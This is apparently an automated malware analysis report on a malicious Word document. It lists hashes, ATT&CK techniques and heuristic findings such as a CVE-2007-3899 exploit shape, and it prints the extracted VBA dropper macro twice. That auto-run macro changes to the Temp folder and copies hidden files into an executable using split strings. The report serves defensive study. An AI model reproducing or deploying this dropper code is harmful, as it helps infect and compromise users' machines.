Office (OLE) malware analysis — malicious · cbe944670b42777d

MALICIOUS

Office (OLE)

229.0 KB Created: 2018-08-14 11:54:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: 755e7a76bec16a31f767779d258edb8f SHA-1: be50811c407a9ffbac5908ddb3c0dcfd63d56ac2 SHA-256: cbe944670b42777dcc98a045bbe1cf4413376c8a73ee96a334074c53f8c4e8fd

438 Risk Score

Malware Insights

MITRE ATT&CK

T1203 Exploitation for Client Execution T1059.005 Visual Basic

The sample is a Microsoft Word document containing VBA macros, specifically a Document_Open macro designed to execute malicious code. Heuristics indicate exploitation of CVE-2007-3899, a memory corruption vulnerability, which is used in conjunction with API calls like VirtualAlloc and VirtualProtect to achieve code execution. The VBA macro attempts to save the document in a new format and quit the application, suggesting it's a dropper for further malicious activity.

Heuristics 14

CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899

Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT

OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
XOR-encoded strings (key 0xA0) critical SC_XOR_ENCODED

Found 3 Windows library/API name(s) XOR-encoded with single-byte key 0xA0: 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc'

Disassembly hidden — these bytes score as data, not coherent x86 code (0/4 branch targets land on an instruction boundary (0% coherence)).
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Reference to GetProcAddress API high SC_STR_GETPROCADDRESS

Reference to GetProcAddress API
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 234,496 bytes but its declared streams total only 134,130 bytes — 100,366 bytes (43%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set FSO = CreateObject("scripting.filesystemobject")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
ChDir Environ("Temp")
```
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT

Reference to VirtualProtect API
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2429 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2429 bytes
SHA-256: `983facd99a99a21556f9baf112f8e73bcd4479ab7c3374d44effe6a50eb1e7d4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next Call kfs Call sdfsdf Set d = New DataObject d.SetText " " d.PutInClipboard Selection.MoveUp Unit:=wdScreen, Count:=7 Selection.MoveUp Unit:=wdScreen, Count:=7 Selection.MoveLeft Unit:=wdCharacter, Count:=13 Dim t As Date t = Now Do DoEvents Loop Until Now >= DateAdd("s", 3, t) Call Module1.killo End Sub Private Sub Document_Close() Call closee End Sub Private Function DecodeBase64(ByVal strData As String) As Byte() Dim objXML As MSXML2.DOMDocument Dim objNode As MSXML2.IXMLDOMElement Set objXML = New MSXML2.DOMDocument Set objNode = objXML.createElement("b64") objNode.dataType = "bin.base64" objNode.Text = strData DecodeBase64 = objNode.nodeTypedValue Set objNode = Nothing Set objXML = Nothing End Function Attribute VB_Name = "Module1" Sub killo() ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument Application.Quit End Sub Attribute VB_Name = "Module2" Attribute VB_Name = "Module3" Sub kfs() Selection.MoveDown Unit:=wdScreen, Count:=7 Selection.MoveDown Unit:=wdScreen, Count:=7 Selection.MoveRight Unit:=wdCharacter, Count:=24 Selection.TypeBackspace Selection.Copy End Sub Attribute VB_Name = "Module4" Sub sdfsdf() ChDir Environ("Temp") Selection.TypeBackspace Dim FSO As Object Set FSO = CreateObject("scripting.filesystemobject") FSO.copyfile Source:="5C.p" & "if", Destination:="6.e" & "xe" FSO.copyfile Source:="5C.pi" & "f", Destination:="6.p" & "if" End Sub Private Function DecodeBase64(ByVal strData As String) As Byte() Dim objXML As MSXML2.DOMDocument Dim objNode As MSXML2.IXMLDOMElement Set objXML = New MSXML2.DOMDocument Set objNode = objXML.createElement("b64") objNode.dataType = "bin.base64" objNode.Text = strData DecodeBase64 = objNode.nodeTypedValue Set objNode = Nothing Set objXML = Nothing End Function

SHA-256: 983facd99a99a21556f9baf112f8e73bcd4479ab7c3374d44effe6a50eb1e7d4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next


Call kfs
    


Call sdfsdf

 Set d = New DataObject
    d.SetText " "
    d.PutInClipboard
    Selection.MoveUp Unit:=wdScreen, Count:=7
   Selection.MoveUp Unit:=wdScreen, Count:=7
    Selection.MoveLeft Unit:=wdCharacter, Count:=13

  Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", 3, t)


Call Module1.killo

End Sub

Private Sub Document_Close()
Call closee

End Sub

Private Function DecodeBase64(ByVal strData As String) As Byte()

 

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    

    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

 

End Function

Attribute VB_Name = "Module1"
Sub killo()
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument
Application.Quit
End Sub

Attribute VB_Name = "Module2"

Attribute VB_Name = "Module3"
Sub kfs()
Selection.MoveDown Unit:=wdScreen, Count:=7
    Selection.MoveDown Unit:=wdScreen, Count:=7
 Selection.MoveRight Unit:=wdCharacter, Count:=24
    Selection.TypeBackspace
        Selection.Copy

End Sub

Attribute VB_Name = "Module4"
Sub sdfsdf()
ChDir Environ("Temp")
Selection.TypeBackspace

   Dim FSO As Object
Set FSO = CreateObject("scripting.filesystemobject")
     
FSO.copyfile Source:="5C.p" & "if", Destination:="6.e" & "xe"
FSO.copyfile Source:="5C.pi" & "f", Destination:="6.p" & "if"

End Sub
Private Function DecodeBase64(ByVal strData As String) As Byte()

 

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    

    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

 

End Function

Open this report in the interactive analyzer, or submit your own file for analysis.